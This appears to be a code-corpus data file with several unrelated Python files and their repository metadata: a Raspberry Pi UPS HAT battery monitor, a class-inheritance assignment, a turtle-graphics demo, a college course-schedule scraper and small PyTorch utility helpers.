6ad630abf6253cb5e5c5e807b26864f05dec66e7 | 7ad570c16d54835f79e657b40c8162e25365f724 | /smartups.py | 2a15664737205f9e09a4dc13e8f86a1ac136ffac | [] | no_license | u-geek/SmartUPSV3 | 1741e3a21c5b75874a8f5e5a1685f3de6ff9b37c | d26516a261f39bf8499e82242ffcbe11b1900526 | refs/heads/master | 2023-04-30T09:02:16.814818 | 2021-05-18T09:08:33 | 2021-05-18T09:08:33 | 264,562,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,069 | py | # coding=UTF-8
#
# U-GEEK Raspi Smart UPS HAT V3
#
import os
import time
import smbus
import signal
import logging
import threading
from neopixel import *
from logging.handlers import RotatingFileHandler
# Global settings
BUS_ADDR = 1                  # I2C bus index (Raspberry Pi /dev/i2c-1)
disconnectflag = False        # True while external power is lost
exit_thread = False           # tells the LED thread to stop
max17048_soc = 0              # last state-of-charge reading (%)
POWEROFF_POWER = 5            # SOC (%) below which we shut the Pi down
count = 0                     # consecutive low-battery samples seen
#MAX17048 settings
MAX17048_ADDR = 0x36
# BQ25895 settings
BQ25895_ADDRESS = 0x6A
REG_WATCHDOG = 0x07
BYTE_WATCHDOG_STOP = 0b10001101 #Stop Watchdog timer
REG_ILIM = 0x00 #ILIM register
#BYTE_ILIM = 0b01101000 #2A input current limit
#BYTE_ILIM = 0b01111100 #3A input current limit
BYTE_ILIM = 0b01111111 #3.25A input current limit
REG_ICHG = 0x04
# NOTE(review): comment said ".5A" but 0b01111111 is the register's
# maximum charge-current code — confirm intended limit.
BYTE_ICHG = 0b01111111 #.5A charging current limit
REG_CONV_ADC = 0x02
REG_BATFET = 0x09
BYTE_BATFET = 0b01001000 #delay before battery == disconnected
BAT_CAPACITY = 2500 #Battery capacity in mah
CURRENT_DRAW = 2000 #Current draw in mah
# NOTE(review): REG_CONV_ADC is defined twice with the same value.
REG_CONV_ADC = 0x02
BYTE_CONV_ADC_START = 0b10011101
BYTE_CONV_ADC_STOP = 0b00011101
REG_BATFET_DIS = 0x09
BYTE_BATFET_DIS = 0b01101000
REG_STATUS = 0x0B #address of status register
REG_BATV = 0x0e
REG_FAULT = 0x0c
REG_BATI = 0x12
# WS2812 settings
LED_COUNT = 16 # Number of LED pixels.
LED_PIN = 18
# LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 26
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# LED Color
# NOTE(review): the argument order appears to be (G, R, B) given the
# names below — confirm against the strip's color order.
COLOR_RED = Color(0,255,0)
COLOR_GREEN = Color(255,0,0)
COLOR_BLUE = Color(0,0,255)
COLOR_YELLOW = Color(255,255,0)
COLOR_PURPLE = Color(0,255,255)
COLOR_CYAN = Color(255,0,255)
COLOR_WHITE = Color(255,255,255)
COLOR_BLACK = Color(0,0,0)
# --- I2C bus and MAX17048 fuel-gauge helpers ---
def init_i2c():
    """Open the I2C bus shared by the fuel gauge and the charger."""
    global bus
    bus = smbus.SMBus(BUS_ADDR)
def max17048_init():
    """Issue the MAX17048 power-on-reset command."""
    bus.write_word_data(MAX17048_ADDR, 0xFE, 0xFFFF)
    return True
def max17048_getstatus():
    """Read cell voltage and state-of-charge into the module globals."""
    global max17048_v, max17048_soc
    raw_v = bus.read_word_data(MAX17048_ADDR, 0x02)
    raw_soc = bus.read_word_data(MAX17048_ADDR, 0x04)
    # Register words arrive byte-swapped; swap before scaling.
    max17048_v = (((raw_v & 0x00FF) << 8) + (raw_v >> 8)) * 78.125 / 1000000
    max17048_soc = (((raw_soc & 0x00FF) << 8) + (raw_soc >> 8)) / 256
# --- BQ25895 charger helpers ---
def bq25895_init():
    """Program the charger: stop the watchdog, set input/charge limits."""
    for reg, value in ((REG_WATCHDOG, BYTE_WATCHDOG_STOP),
                       (REG_ILIM, BYTE_ILIM),
                       (REG_ICHG, BYTE_ICHG),
                       (REG_BATFET, BYTE_BATFET)):
        bus.write_byte_data(BQ25895_ADDRESS, reg, value)
def bq25895_int_to_bool_list(num):
    """Expand a byte into its 8 bit flags, least-significant bit first."""
    return [bool(num >> n & 1) for n in range(8)]
def bq25895_translate(val, in_from, in_to, out_from, out_to):
    """Linearly map ``val`` from [in_from, in_to] onto [out_from, out_to]."""
    fraction = float(val - in_from) / (in_to - in_from)
    return out_from + fraction * (out_to - out_from)
def bq25895_read_reg(reg):
    """Read one charger register byte."""
    return bus.read_byte_data(BQ25895_ADDRESS, reg)
# BQ25895 read status
def bq25895_read_status():
    # Samples the charger, derives power/charge state and an estimated
    # runtime, and publishes the result in the bq25895_status global.
    # NOTE(review): SLEEPDELAY is declared global but never assigned or
    # read here — confirm it is still needed.
    global SLEEPDELAY, disconnectflag, batpercentprev, bq25895_status
    # Kick off an ADC conversion, wait for it, then stop it again.
    bus.write_byte_data(BQ25895_ADDRESS, REG_CONV_ADC, BYTE_CONV_ADC_START)
    sample = bus.read_byte_data(BQ25895_ADDRESS, REG_STATUS)
    status = bq25895_int_to_bool_list(sample)
    time.sleep(1.2)
    sample = bus.read_byte_data(BQ25895_ADDRESS, REG_BATV)
    batvbool = bq25895_int_to_bool_list(sample)
    bus.write_byte_data(BQ25895_ADDRESS, REG_CONV_ADC, BYTE_CONV_ADC_STOP)
    #print(sample)
    # Raw status fields (computed but unused below).
    vsys_stat = status[0]
    sdp_stat = status[1]
    pg_stat = status[2]
    chrg_stat = status[4] * 2 + status[3]
    vbus_stat = status[7] * 4 + status[6] * 2 + status[5]
    # Power-good bit => external power present.
    if status[2]:
        power = "Connected"
    else:
        power = "Disconnected"
    # Charge-state bits (status[4:3]): 11 done, 10 charging,
    # 01 pre-charge, 00 not charging.
    if status[3] and status[4]:
        charge = "Charging done"
    elif status[4] and not status[3]:
        charge = "Charging"
    elif not status[4] and status[3]:
        charge = "Pre-Charge"
    else:
        charge = "Discharging"
    #convert batv register to volts
    batv = 2.304
    batv += batvbool[6] * 1.280
    batv += batvbool[5] * 0.640
    batv += batvbool[4] * 0.320
    batv += batvbool[3] * 0.160
    batv += batvbool[2] * 0.08
    batv += batvbool[1] * 0.04
    batv += batvbool[0] * 0.02
    # Crude SOC estimate: linear between 3.5 V (0%) and 4.184 V (100%).
    batpercent = bq25895_translate(batv,3.5,4.184,0,1)
    if batpercent<0 :
        batpercent = 0
    elif batpercent >1 :
        batpercent = 1
    # Minutes of runtime left at the assumed constant draw.
    timeleftmin = int( batpercent * 60* BAT_CAPACITY / CURRENT_DRAW)
    if timeleftmin < 0 :
        timeleftmin = 0
    if power == "Connected" :
        timeleftmin = -1
    # Broadcast once on each power-loss / power-restore transition
    # (the actual wall message is currently disabled).
    if power == "Disconnected" and disconnectflag == False :
        disconnectflag = True
        message = "echo Power Disconnected, system will shutdown in %d minutes! | wall" % (timeleftmin)
        #os.system(message)
    if power == "Connected" and disconnectflag == True :
        disconnectflag = False
        message = "echo Power Restored, battery at %d percent | wall" % (batpercentprev * 100)
        #os.system(message)
    batpercentprev = batpercent
    bq25895_status = {
        'Input': power,
        'ChargeStatus' : charge,
        'BatteryVoltage' : '%.2f' % batv,
        "BatteryPercentage" : int(batpercent*100),
        'TimeRemaining' : int(timeleftmin)
    }
    # Below 3.5 V: disconnect the battery FET to protect the cell.
    if(batv < 3.5):
        bus.write_byte_data(BQ25895_ADDRESS, REG_BATFET_DIS, BYTE_BATFET_DIS)
def print_bq25895status():
print "Input: " , bq25895_status['Input']
print "ChargeStatus: " , bq25895_status['ChargeStatus']
print "BatteryVoltage: " , bq25895_status['BatteryVoltage'], "V"
print "BatteryPercentage: " , bq25895_status['BatteryPercentage'] , "%"
print("VSYS_STAT: ", bin(vsys_stat), "SDP_STAT: ", bin(sdp_stat),
"PG_STAT:", bin(pg_stat), "CHRG_STAT:" , bin(chrg_stat),
"VBUS_STAT:", bin(vbus_stat))
def print_max17048status():
print "Status of max17048:"
print '%.2f' % max17048_v , "V"
print max17048_soc , "%"
print "Status of bq25895:"
# Initialize the library (must be called once before other functions).
def led_init():
    """Create and start the NeoPixel strip object (module global)."""
    global strip
    strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA,
                              LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
    strip.begin()
def led_off():
    """Blank all four status LEDs."""
    for pixel in range(4):
        strip.setPixelColor(pixel, COLOR_BLACK)
    strip.show()
def led_full():
    """Battery full: all four LEDs solid green."""
    for pixel in range(4):
        strip.setPixelColor(pixel, COLOR_GREEN)
    strip.show()
# --- LED status patterns ---
# The original ten functions each repeated the same 0->255->0 fade loop;
# the shared helpers below keep behavior identical while removing the
# duplication.  Function names and call signatures are unchanged.
def _led_stage(assignments):
    """Stage (pixel, color) pairs without showing; the next strip.show()
    displays them (matches the original set-then-fade sequencing)."""
    for pixel, color in assignments:
        strip.setPixelColor(pixel, color)
def _led_pulse(pixels, make_color):
    """Ramp brightness 0->255->0 on ``pixels`` at 5 ms per step, then rest
    for 1 s.  Honors exit_thread so the LED thread can stop mid-fade; the
    trailing rest is skipped in that case (as in the original loops)."""
    for level in list(range(0, 255)) + list(range(255, 0, -1)):
        if exit_thread:
            return
        for pixel in pixels:
            strip.setPixelColor(pixel, make_color(level))
        strip.show()
        time.sleep(0.005)
    time.sleep(1)
# pre-charge: all four LEDs breathe red
def led_precharge():
    _led_pulse([0, 1, 2, 3], lambda i: Color(i, 0, 0))
# Charging to 25%: LED 4 breathes blue, others off
def led_charginto25():
    _led_stage([(0, COLOR_BLACK), (1, COLOR_BLACK), (2, COLOR_BLACK)])
    _led_pulse([3], lambda i: Color(0, 0, i))
# Charging from 25% to 50%: LED 4 blue, LED 3 breathes
def led_chargingto50():
    _led_stage([(0, COLOR_BLACK), (1, COLOR_BLACK), (3, COLOR_BLUE)])
    _led_pulse([2], lambda i: Color(0, 0, i))
# Charging from 50% to 75%: LEDs 3,4 blue, LED 2 breathes
def led_chargingto75():
    _led_stage([(0, COLOR_BLACK), (2, COLOR_BLUE), (3, COLOR_BLUE)])
    _led_pulse([1], lambda i: Color(0, 0, i))
# Charging from 75% to 100%: LEDs 2,3,4 blue, LED 1 breathes
def led_chargingto100():
    _led_stage([(1, COLOR_BLUE), (2, COLOR_BLUE), (3, COLOR_BLUE)])
    _led_pulse([0], lambda i: Color(0, 0, i))
# Discharging to 75%: three green LEDs
def led_dischargeto75():
    _led_stage([(0, COLOR_BLACK), (1, COLOR_GREEN),
                (2, COLOR_GREEN), (3, COLOR_GREEN)])
    strip.show()
# Discharging to 50%: two green LEDs
def led_dischargeto50():
    _led_stage([(0, COLOR_BLACK), (1, COLOR_BLACK),
                (2, COLOR_GREEN), (3, COLOR_GREEN)])
    strip.show()
# Discharging to 25%: one green LED
def led_dischargeto25():
    _led_stage([(0, COLOR_BLACK), (1, COLOR_BLACK),
                (2, COLOR_BLACK), (3, COLOR_GREEN)])
    strip.show()
# Discharging to 10%: one yellow LED
def led_dischargeto10():
    _led_stage([(0, COLOR_BLACK), (1, COLOR_BLACK),
                (2, COLOR_BLACK), (3, COLOR_YELLOW)])
    strip.show()
# Discharging to 0%: last LED breathes yellow
def led_dischargeto0():
    _led_stage([(0, COLOR_BLACK), (1, COLOR_BLACK), (2, COLOR_BLACK)])
    _led_pulse([3], lambda i: Color(i, i, 0))
def led_show():
    # LED-thread main loop: render the battery/charging state until the
    # exit_thread flag is raised, then blank the LEDs.
    while exit_thread is False:
        if bq25895_status['Input'] == 'Connected': # Power connected
            if bq25895_status['ChargeStatus'] == 'Charging done':
                led_full()
            elif bq25895_status['ChargeStatus'] == 'Charging':
                # Pick the animation band from the fuel-gauge SOC.
                if max17048_soc > 75:
                    led_chargingto100()
                elif ((max17048_soc > 50) and (max17048_soc <= 75)):
                    led_chargingto75()
                elif ((max17048_soc > 25) and (max17048_soc <= 50)):
                    led_chargingto50()
                else:
                    led_charginto25()
            elif bq25895_status['ChargeStatus'] == 'Pre-Charge':
                led_precharge()
            elif bq25895_status['ChargeStatus'] == 'Discharging':
                # Powered but not charging: show as full.
                led_full()
            else:
                led_off()
        else: # Power Disconnected
            # Static (or blinking, near empty) gauge from the SOC.
            if max17048_soc > 90:
                led_full()
            elif ((max17048_soc > 75) and (max17048_soc <= 90)):
                led_dischargeto75()
            elif ((max17048_soc > 50) and (max17048_soc <= 75)):
                led_dischargeto50()
            elif ((max17048_soc > 25) and (max17048_soc <= 50)):
                led_dischargeto25()
            elif ((max17048_soc > 10) and (max17048_soc <= 25)):
                led_dischargeto10()
            else:
                led_dischargeto0()
    led_off()
def stop(sig, frame):
led_off()
exit_thread = True
def ignore(sig, frsma):
led_off()
exit_thread = True
def handler(signum, frame):
print "Signal is received:" + str(signum)
exit_thread=True
thread_led.join()
exit
def handle_signal():
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGUSR2, handler)
signal.signal(signal.SIGALRM, handler)
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGQUIT, handler)
def logging_status():
    """Append one power/charge/SOC line to the rotating log."""
    app_log.info(' Input:' + bq25895_status['Input'] +
                 ' , ChargeStatus: ' + bq25895_status['ChargeStatus'] +
                 ' , SOC:' + str(max17048_soc) + "%")
# Main Loop
if __name__ == '__main__':
    # Rotating log: up to 5 MB per file, two backups kept.
    log_formatter = logging.Formatter('%(asctime)s %(filename)s : %(levelname)s %(message)s')
    log_filename = '/var/log/smartups.log'
    log_handler = RotatingFileHandler(log_filename, mode='a', maxBytes=5 * 1024 * 1024,
                                      backupCount=2, encoding=None, delay=0)
    log_handler.setFormatter(log_formatter)
    log_handler.setLevel(logging.INFO)
    app_log = logging.getLogger('root')
    app_log.setLevel(logging.DEBUG)
    app_log.addHandler(log_handler)
    # Bring up the hardware, then start the LED animation thread.
    init_i2c()
    max17048_init()
    bq25895_init()
    bq25895_read_status()
    led_init()
    led_precharge()
    thread_led = threading.Thread(target=led_show)
    thread_led.start()
    try:
        while True:
            max17048_getstatus()
            bq25895_read_status()
            logging_status()
            # Shut down after >10 consecutive low-battery samples
            # while running on battery.
            if ((bq25895_status['Input'] != 'Connected') and (max17048_soc < POWEROFF_POWER)):
                # NOTE(review): count is never reset when power returns
                # — confirm whether transient dips should accumulate.
                count = count + 1
                if count > 10:
                    # Bug fix: log through the configured app_log
                    # (logging.warning bypassed the rotating handler).
                    app_log.warning("Shutdown")
                    os.system("sudo halt -h")
    except:
        # Deliberate catch-all: any failure (including Ctrl-C) must
        # still stop the LED thread before the process dies.
        exit_thread = True
        thread_led.join()
        # NOTE(review): bare ``exit`` is a no-op — probably sys.exit().
        exit
| [
"howard.qiao@u-geek.net"
] | howard.qiao@u-geek.net |
735e88cdd3e9e2d80925c43fd342adb28accaf4b | cae2711e78be547681ff5635bd00f8fb9fee1b9f | /AnimalAssignment/AssignmentAnimal.py | 03c4e06c49793010460175dd395cb261ce92e8f9 | [] | no_license | RoselinBurgos/CodingDojo-Python | 1ac049d56292f078fda2bf11749acfe1bdd3e980 | 1a7507fcdeeaa20fcb940ed8b9e30fb433d43d78 | refs/heads/master | 2020-04-09T14:41:19.607926 | 2018-12-04T21:02:22 | 2018-12-04T21:02:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,130 | py | # Create an Animal class and give it the below attributes and methods.
# Extend the Animal class to two child classes, Dog and Dragon.
# Objective
# The objective of this assignment is to help you understand inheritance.
# Remember that a class is more than just a collection of properties and methods.
# If you want to create a new class with attributes and methods that are already defined in another class,
# you can have this new class inherit from that other class (called the parent) instead of copying and pasting code from the original class.
# Child classes can access all the attributes and methods of a parent class AND have new attributes and methods of its own,
# for child instances to call. As we see with Wizard / Ninja / Samurai (that are each descended from Human),
# we can have numerous unique child classes that inherit from the same parent class.
# Animal Class
# Attributes:
# • name
# • health
# Methods:
# • walk: decreases health by one
# • run: health decreases by five
# • display health: print to the terminal the animal's health.
# Create an instance of the Animal, have it walk() three times, run() twice, and finally displayHealth() to confirm that the health attribute has changed.
# Dog Class
# • inherits everything from Animal
# Attributes:
# • default health of 150
# Methods:
# • pet: increases health by 5
# Have the Dog walk() three times, run() twice, pet() once, and have it displayHealth().
# Dragon Class
# • inherits everything from Animal
# Attributes:
# • default health of 170
# Methods:
# • fly: decreases health by 10
# • display health: prints health by calling the parent method and prints "I am a Dragon"
# Now try creating a new Animal and confirm that it can not call the pet() and fly() methods,
# and its displayHealth() is not saying 'this is a dragon!'. Also confirm that your Dog class can not fly().
class Animal:
    """A creature with a name and a health pool that movement drains."""
    def __init__(self, name):
        self.name = name
        self.health = 100  # every animal starts at full health
    def walk(self):
        """Walk: costs 1 health. Returns self for chaining."""
        print("Walking")
        self.health -= 1
        return self
    def run(self):
        """Run: costs 5 health. Returns self for chaining."""
        print("Running")
        self.health -= 5
        return self
    def display_health(self):
        """Print the name and current health. Returns self for chaining."""
        print("My name is " + str(self.name))
        print("Health " + str(self.health))
        return self
class Dog(Animal):
    """An Animal with extra health that can be petted to heal."""
    def __init__(self, name):
        super().__init__(name)
        self.health = 150  # dogs start hardier than a generic Animal
    def pet(self):
        """Pet the dog: restores 5 health. Returns self for chaining."""
        print("Petting")
        self.health += 5
        return self
class Dragon(Animal):
    """An Animal that can fly; flying is tiring."""
    def __init__(self, name):
        super().__init__(name)
        self.health = 170  # dragons get the largest health pool
    def fly(self):
        """Fly: costs 10 health (the assignment spec above says flying
        *decreases* health; the old code added it). Returns self."""
        print("Flying")
        self.health -= 10
        return self
    def display_health(self):
        """Show health via the parent method, then announce dragonhood
        (per spec: 'prints health by calling the parent method')."""
        super().display_health()
        print("I AM A DRAGON!")
        return self
# Demo: exercise each class and confirm the chained calls work.
animal1 = Animal("Jax")
animal1.walk().walk().walk().run().run().display_health()
animal2 = Dog("Dexter")
animal2.walk().walk().walk().run().run().pet().display_health()
animal3 = Dragon("Elliot")
animal3.fly().fly().display_health()
| [
"RoselinBurgos.com"
] | RoselinBurgos.com |
98d29b8ee00151cf5694bb05f8a21fcda2e47eda | caee3d333a6f8115f99c7a33138d2a2a2d8e9678 | /V_turtle1.py | b5d69dd076d43978d68fc4ab6b4fd99df22a4076 | [] | no_license | VishalGupta2597/batch89 | c24e004ce4beee075a0e75f740e1afdae724f992 | b11cfbcccb3884e06190938f8ca6272a41161366 | refs/heads/master | 2022-01-22T10:02:46.204693 | 2019-08-01T02:39:51 | 2019-08-01T02:39:51 | 197,910,034 | 2 | 1 | null | 2019-07-20T09:39:48 | 2019-07-20T09:39:47 | null | UTF-8 | Python | false | false | 619 | py | from turtle import *
# Turtle drawing demo: one turtle on a titled screen.
s = Turtle() #s is the object of Turtle class
w = Screen() #w is the object of Screen class
s.shape("turtle")
s.speed(1)
w.title("Vish Turtle")
#s.write("Vishal")
#w.bgcolor("yellow")
s.color("green")
s.pencolor("Blue")
s.pensize(5)
"""s.begin_fill()
for i in range(4):
    s.forward(100)
    s.left(90)
s.end_fill()
s.up()
s.backward(150)
s.down()
s.color("orange")
s.pencolor('blue')
s.begin_fill()
for j in range(4):
    s.forward(100)
    s.left(90)
s.end_fill()"""
# Jump (pen up) to the start point, then draw a filled 10-sided
# "circle" with a stamped turtle shape.
s.up()
s.goto(-100,90)
s.down()
s.begin_fill()
s.stamp()
s.shape('circle')
s.circle(100,steps=10)
s.end_fill()
done()
"vishalg2597@gmail.com"
] | vishalg2597@gmail.com |
a81e55d98b7ef096729671d0cc633f724691b3c7 | ddada1d76aa4cb426040662bac084832f0079f10 | /WebCrawler2.py | ff784eee092f6101e1fe01b3353b3d081f1a63f0 | [] | no_license | cs257f19/web-project-web-project-team-a | e5f002c312d6e60f3dae2c0d7ba582311e4b1059 | 842d6fdb694f88744cdce7439296f6bb078e4304 | refs/heads/master | 2021-07-07T07:50:13.268502 | 2019-11-26T03:42:22 | 2019-11-26T03:42:22 | 213,968,989 | 0 | 1 | null | 2020-12-15T17:36:22 | 2019-10-09T16:31:22 | HTML | UTF-8 | Python | false | false | 10,360 | py | import requests
from lxml.html import fromstring
import csv
import unidecode
master_list = []
class Course:
"""
Course subclass with instance variables for metadata of the course
"""
def __init__(self, dept, num, name, term, reqs, periods, prof, desc):
"""
Course object constructor
:param dept: department code
:param num: course number
:param name: course name
:param term: term offered
:param reqs: liberal arts requirements fulfilled by course
:param periods: class period(s) offered
:param prof: professor who teaches the course
:param desc: the course description
"""
self.dept = dept
self.num = num
self.name = name
self.term = term
self.reqs = reqs
self.periods = periods
self.prof = prof
self.desc = desc
# Every department code on the ENROLL tool, and the three term codes
# (Fall 2019, Winter 2020, Spring 2020) used in the query string.
departments = ['AFST', 'AMMU', 'AMST', 'ARBC', 'ARCN', 'ARTH', 'ASLN', 'ASST', 'ASTR', 'BIOL', 'CHEM', 'CHIN', 'CAMS',
               'CLAS', 'CGSC', 'CS', 'CCST', 'DANC', 'DGAH', 'ECON', 'EDUC', 'ENGL', 'ENTS', 'EUST', 'FREN', 'GEOL',
               'GERM', 'GRK', 'HEBR', 'HIST', 'IDSC', 'JAPN', 'LATN', 'LTAM', 'LING', 'LCST', 'MATH', 'MARS', 'MEST',
               'MELA', 'MUSC', 'NEUR', 'PHIL', 'PE', 'PHYS', 'POSC', 'PSYC', 'RELG', 'RUSS', 'SOAN', 'SPAN', 'ANCE',
               'ARTS', 'THEA', 'WGST']
terms = ['19FA', '20WI', '20SP']
def collect_dept(dept_iter):
    """Return the department code at position ``dept_iter``."""
    return departments[dept_iter]
def collect_nums(tree, i):
    """Extract the course number for the i-th course on the page."""
    raw = str(tree.xpath('//*[@id="enrollModule"]/div[1]/div[' + str(i) + ']/h3/span[1]/text()'))
    # Keep only digits and the decimal point, e.g. "CS 257.00" -> 257.0
    return float(''.join(ch for ch in raw if ch.isdigit() or ch == '.'))
def collect_name(tree, i):
    """Extract the course name for the i-th course on the page."""
    raw = str(tree.xpath('//*[@id="enrollModule"]/div/div[' + str(i) + ']/h3/text()')[0])
    # Trim the single stray character on each end of the scraped text.
    return raw[1:-1]
def collect_terms(term_iter):
    """Map the term-loop index (0/1/2) to a human-readable term name."""
    names = {0: 'Fall 2019', 1: 'Winter 2020', 2: 'Spring 2020'}
    return names.get(term_iter, 'Term not found')
def collect_reqs(tree, course_iter):
    """Return comma-separated liberal-arts requirement codes for a course.

    Inspects up to three requirement links; '' when none match.
    """
    # Substring marker -> requirement code, in the original check order.
    req_codes = (
        ("Formal", "FSR"), ("Quantitative", "QRE"),
        ("Argument & Inquiry", "AI"), ("Writing ", "WRC"),
        ("Intercultural Dom", "IDS"), ("Social", "SOC"),
        ("Humanistic", "HUM"), ("International", "INS"),
        ("Lab", "LAB"), ("Arts", "ARP"),
        ("Literary", "LAA"), ("PE", "PER"),
    )
    reqs = []
    for i in range(1, 4):
        string = str(tree.xpath(
            '//*[@id="enrollModule"]/div[1]/div[' + str(course_iter) + ']/div[1]/div[2]/ul/li[' + str(
                i) + ']/a/text()'))
        for marker, code in req_codes:
            if marker in string:
                reqs.append(code)
    if not reqs:
        return ''
    # Render like the original: list repr stripped of quotes/brackets.
    return str(reqs).replace('\'', '').replace('[', '').replace(']', '').replace('\"', '')
def collect_period(tree, course_iter):
    """Return the class period for a course: '1a'..'6a' for MWF starts,
    'N/Mc' codes for T/Th starts, or a fallback message."""
    mwf = {'8:30': '1a', '9:50': '2a', '11:10': '3a',
           '12:30': '4a', '1:50': '5a', '3:10': '6a'}
    tth = {'8:15': '1/2c', '10:10': '2/3c', '1:15': '4/5c', '3:10': '5/6c'}
    start_time = str(tree.xpath('//*[@id="enrollModule"]/div/div[' + str(course_iter) + ']/div[1]/div['
                                '1]/table/tbody/tr/td['
                                '1]/span[1]/text()'))
    if start_time != '[]':
        # The MWF column carried a start time.
        for clock, period in mwf.items():
            if clock in start_time:
                return period
    else:
        # Otherwise try the Tuesday/Thursday column.
        start_time = str(tree.xpath('//*[@id="enrollModule"]/div/div[' + str(course_iter) + ']/div[1]/div['
                                    '1]/table/tbody/tr/td['
                                    '2]/span[1]/text()'))
        for clock, period in tth.items():
            if clock in start_time:
                return period
    return 'Unable to determine class period'
def collect_professor(tree, course_iter):
    """Return the instructor's name, or '' when none is listed."""
    prof = str(tree.xpath('//*[@id="enrollModule"]/div[1]/div[' + str(course_iter) + ']/div[2]/p[1]/a/text()')).replace(
        '[\'', '').replace('\']', '')
    return '' if prof == '[]' else prof
def collect_desc(tree, course_iter):
    """Return the course description, or '' when none is listed."""
    desc = str(tree.xpath('//*[@id="enrollModule"]/div[1]/div[' + str(course_iter) + ']/div[2]/p[2]/text()')).replace(
        '\\xa0', ' ')
    return '' if desc == '[]' else desc[2:-2]
def get_number_offered_for_term(tree):
    """Return how many courses this department offers this term.

    The count appears in a '... found NN ...' sentence inside either the
    third or second <p> of the enroll module; 0 when absent.
    """
    text = str(tree.xpath('//*[@id="enrollModule"]/p[3]/text()'))
    if 'found' not in text:
        text = str(tree.xpath('//*[@id="enrollModule"]/p[2]/text()'))
        if 'found' not in text:
            return 0
    # Grab the (up to two-digit) number right after the word "found".
    start = text.index('found') + 6
    digits = [ch for ch in text[start:start + 2] if ch.isdigit()]
    return int(''.join(digits))
def create_csv(course_list):
    """Write every Course to presentation_courses.csv, one row each."""
    header = ['Department', 'Course Number', 'Course Name', 'Term',
              'Liberal Arts Requirements', 'Class Period', 'Professor',
              'Description']
    with open('presentation_courses.csv', 'w') as csvfile:
        writer = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)
        writer.writerow(header)
        for course in course_list:
            writer.writerow([course.dept, course.num, course.name,
                             course.term, course.reqs, course.periods,
                             course.prof, course.desc])
def crawl_page(page, dept_iter, term_iter):
    """
    Crawls a specific page on Carleton's ENROLL tool
    :param page: the current page from Carleton ENROLL
    :param dept_iter: iterative variable representing which department is currently being crawled
    :param term_iter: iterative variable representing which term is currently being crawled
    :return: None
    """
    tree = fromstring(page.content)
    # Course slots on the page are 1-indexed; build one Course per listing.
    for course_num in range(1, get_number_offered_for_term(tree) + 1):
        master_list.append(Course(
            collect_dept(dept_iter),
            collect_nums(tree, course_num),
            collect_name(tree, course_num),
            collect_terms(term_iter),
            collect_reqs(tree, course_num),
            collect_period(tree, course_num),
            collect_professor(tree, course_num),
            collect_desc(tree, course_num)))
def crawl_department(dept_iter):
    """
    Crawls a specific department's offerings for the year at Carleton
    :param dept_iter: iterative variable representing the location within list:departments to retrieve the current dept
    :return: None
    """
    base = 'https://apps.carleton.edu/campus/registrar/schedule/enroll/?term='
    # Visit the department's page once per term (three terms in the year).
    for term_index in range(3):
        url = base + terms[term_index] + '&subject=' + departments[dept_iter]
        crawl_page(requests.get(url), dept_iter, term_index)
def main():
    """
    Main method for WebCrawler2.py
    Executes a web crawl over all departments for all three terms during the 2019-2020 school year
    :return: none
    """
    for dept_index in range(len(departments)):
        crawl_department(dept_index)
    create_csv(master_list)
# Run the full crawl only when executed as a script, not on import.
if __name__ == '__main__':
    main()
| [
"brownc2@carleton.edu"
] | brownc2@carleton.edu |
d2f8a19b3de851ef689fddf518cebea8c37b91ec | 17fe32a70be82d9fd6c3268b840226b5567c8b29 | /torchtuples/utils.py | bb86e8e2b7557ada3baedd86a27b975d4f3b2644 | [
"MIT",
"BSD-2-Clause"
] | permissive | georgehc/dksa | dbb7161a75b8206d3d469bb5b966ed7a0f84d86c | bcd9eab6c9ded47f5b166cf1351b06e26e0c8f90 | refs/heads/master | 2023-08-02T06:15:12.472386 | 2021-10-01T17:47:25 | 2021-10-01T17:47:25 | 282,355,975 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,855 | py | import time
import random
import numpy as np
import torch
from torchtuples import tuplefy, TupleTree
def make_name_hash(name='', file_ending='.pt'):
    """Create a unique file name '<name>_<Y-M-D_H-M-S>_<20 random chars><file_ending>'.

    The timestamp comes from the local clock and the suffix is 20 random ASCII
    letters/digits, making collisions extremely unlikely.

    :param name: prefix for the generated file name
    :param file_ending: file extension appended at the end
    :return: the generated file name as a string
    """
    import string  # local import keeps the module's public surface unchanged
    year, month, day, hour, minute, second = time.localtime()[:6]
    # Same character set as the old hard-coded literal, via the stdlib.
    alphabet = string.ascii_letters + string.digits
    random_hash = ''.join(random.choices(alphabet, k=20))
    return f"{name}_{year}-{month}-{day}_{hour}-{minute}-{second}_{random_hash}{file_ending}"
class TimeLogger:
    """Tracks elapsed wall-clock time since a start point and since the last check."""

    def __init__(self, start=None):
        # Fixed start time plus a rolling checkpoint advanced by diff().
        self.start = self.time() if start is None else start
        self.prev = self.start

    @staticmethod
    def time():
        """Current wall-clock time in seconds since the epoch."""
        return time.time()

    def diff(self):
        """Return (seconds since start, seconds since last diff) and advance the checkpoint."""
        prev, self.prev = (self.prev, self.time())
        return self.prev - self.start, self.prev - prev

    @staticmethod
    def _hms_from_sec(sec):
        """Split a duration in seconds into (hours, minutes, seconds)."""
        m, s = divmod(sec, 60)
        h, m = divmod(m, 60)
        return h, m, s

    @staticmethod
    def _hms_str(h, m, s, shorten=True):
        """Format hours/minutes/seconds as e.g. '1h:2m:3s'; drop zero hours/minutes if shorten."""
        hs = f"{int(h)}h:"
        ms = f"{int(m)}m:"
        ss = f"{int(s)}s"
        if shorten:
            if h == 0:
                hs = ''
            if m == 0:
                ms = ''
        return f"{hs}{ms}{ss}"

    def hms_diff(self, shorten=True):
        """Return formatted elapsed times (since start, since previous call)."""
        diff_start, diff_prev = self.diff()
        hms_start = self._hms_from_sec(diff_start)
        hms_prev = self._hms_from_sec(diff_prev)
        return self._hms_str(*hms_start, shorten), self._hms_str(*hms_prev, shorten)
